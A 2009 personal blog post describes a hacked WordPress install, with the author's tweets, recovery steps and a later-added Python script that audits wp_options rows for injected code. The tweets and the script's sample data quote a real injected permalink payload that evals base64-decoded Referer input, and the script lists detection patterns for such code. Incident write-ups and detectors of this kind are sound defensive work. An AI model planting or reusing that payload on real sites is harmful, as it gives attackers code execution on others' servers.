Update on WP hack

by Justin Souter on September 6, 2009

Intro

For those of you who follow me via my @souterconsults account, you will have seen me have a paddy on this Friday last. That’s because my WP instance got hacked. Meh :$

So, I thought it would be useful to update anyone interested with a quick run-down, as it sets the scene for any future developments (like a complete re-build: bah).

I’m setting out here:

  • List of tweets, which pretty much explain what happened
  • Brief notes of more detail
  • Other links, if they’re not in the first two sections
  • Actions. Bah

Tweets

  1. argh, wanting to publish my Cloud vids from YouTube, but WP is putting %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ on URL 3:15 PM Sep 4th from twhirl
  2. http://twurl.nl/06n2fh explains – I’m trying to find the malicious code asap :'( 3:42 PM Sep 4th from twhirl
  3. ok, I’ve switched off the navigation on the site & parked links to comments, archive, & recent posts to help avoid people getting borked 4:02 PM Sep 4th from twhirl
  4. Site back in action: WP Permalink config restored – http://twurl.nl/ddfchd fyi ‘Hardening WordPress’ http://twurl.nl/ih81jk 5:09 PM Sep 4th from twhirl
  5. just blogged: Cloud Computing – YouTube videos http://twurl.nl/g38ukl 5:23 PM Sep 4th from twitterfeed
  6. Links for WP hack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ again – http://twurl.nl/5qclh3 & http://twurl.nl/d55o4c 5:39 PM Sep 4th from twhirl

Notes

  1. Was posting about YouTube videos on Cloud Computing
  2. Copying and pasting the URL into Twhirl to send out on Twitter
  3. Noticed there was a whole string of characters after the ‘proper’ URL
  4. Deleted post
  5. Republished
  6. It was still there
  7. Copied the string and Googled it
  8. Found “[resolved] NASTY CODE hacks onto your domain. FIX included.” (#2 in ‘Tweets’)
  9. Went on from there & blogged original post…

Looking at my install:

  • The plugin options table seems to have disappeared [although this may not be a bad thing – I should check the WP changelog…]
  • WP pages seem clean at the mo’

Various links

Worthwhile checking out

Actions

  • Need to do several more, more detailed trawls through my WP install
  • Probably need to do a rebuild (from scratch, preferably). Meh
  • Enabled various plugins, e.g. Login LockDown, but Maintenance Mode didn’t work :-(
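One concrete check that belongs in those "more detailed trawls" is to pull the option rows out of wp_options and audit them for anything that is not an ordinary WordPress value. The script below is an added example, not code from the original post or from WordPress; it assumes the rows have already been exported (for instance with `SELECT option_name, option_value FROM wp_options`) into Python as (name, value) pairs. The sample rows are constructed here: the clean structure `/%postname%/` is an assumption, and the compromised one uses the permalink string quoted in the tweets above. The list of PHP code markers is a heuristic chosen for this example, not a WordPress rule.

```python
import re

# Structure tags WordPress documents for permalink_structure. Anything else
# that appears between percent signs is not something WordPress would put there.
KNOWN_TAGS = {
    "year", "monthnum", "day", "hour", "minute", "second",
    "post_id", "postname", "category", "author",
}

# Characters a hand-written permalink structure normally contains outside tags.
ALLOWED_OUTSIDE_TAGS = re.compile(r"^[A-Za-z0-9/_.\-]*$")

# Heuristic markers of PHP code smuggled into an option value (assumption for
# this example: any one of these in a wp_options value deserves a look).
CODE_MARKERS = [
    (re.compile(r"\beval\s*\("), "eval() call"),
    (re.compile(r"\bbase64_decode\s*\("), "base64_decode() call"),
    (re.compile(r"\$\{"), "PHP complex-syntax interpolation ${...}"),
    (re.compile(r"\$_(?:SERVER|GET|POST|REQUEST|COOKIE)\b"),
     "read of a request superglobal"),
]

# The exact string the post reports being appended to its permalinks.
PAGE_PAYLOAD_STRUCTURE = (
    "/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/"
)

# Constructed sample of what an export of wp_options might look like.
SAMPLE_ROWS = [
    ("siteurl", "http://example.com"),
    ("blogname", "Example blog"),
    ("permalink_structure", PAGE_PAYLOAD_STRUCTURE),
]


def scan_for_code(value):
    """Report which PHP-code markers appear in an option value."""
    return [label for pattern, label in CODE_MARKERS if pattern.search(value)]


def audit_permalink_structure(structure):
    """Return human-readable findings for one permalink_structure value.

    An empty list means the value looks like an ordinary WordPress structure.
    """
    findings = []
    # Non-overlapping %...% pairs; a legitimate structure only uses known tags.
    for tag in re.findall(r"%([^%]*)%", structure):
        if tag not in KNOWN_TAGS:
            findings.append(f"unknown permalink tag %{tag[:40]}%")
    # Everything that is not a tag should be plain path characters.
    remainder = re.sub(r"%[^%]*%", "", structure)
    if not ALLOWED_OUTSIDE_TAGS.match(remainder):
        findings.append("unexpected characters outside permalink tags")
    # A dangling percent sign means an unbalanced tag pair.
    if structure.count("%") % 2:
        findings.append("odd number of percent signs")
    findings.extend(scan_for_code(structure))
    return findings


def audit_options(rows):
    """Audit (option_name, option_value) pairs from wp_options.

    Returns {option_name: [findings]} for the options that have findings.
    """
    report = {}
    for name, value in rows:
        if name == "permalink_structure":
            findings = audit_permalink_structure(value)
        else:
            findings = scan_for_code(value)
        if findings:
            report[name] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit_options(SAMPLE_ROWS).items():
        print(name)
        for finding in findings:
            print("  -", finding)
```

Running it against the constructed rows reports only `permalink_structure`, with the unknown tag and the four code markers listed; a structure such as `/%year%/%monthnum%/%postname%/` comes back clean. Because the check works on exported rows, it can be repeated after a restore or rebuild to confirm the value stayed clean.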

A shot across the bows, hopefully not much more (fingers tightly crossed).

[UPDATE: fyi I believe I was on WP v2.8.0 when I was hacked. Latest version at the time of writing is 2.8.4.]

Technorati Tags: chastened
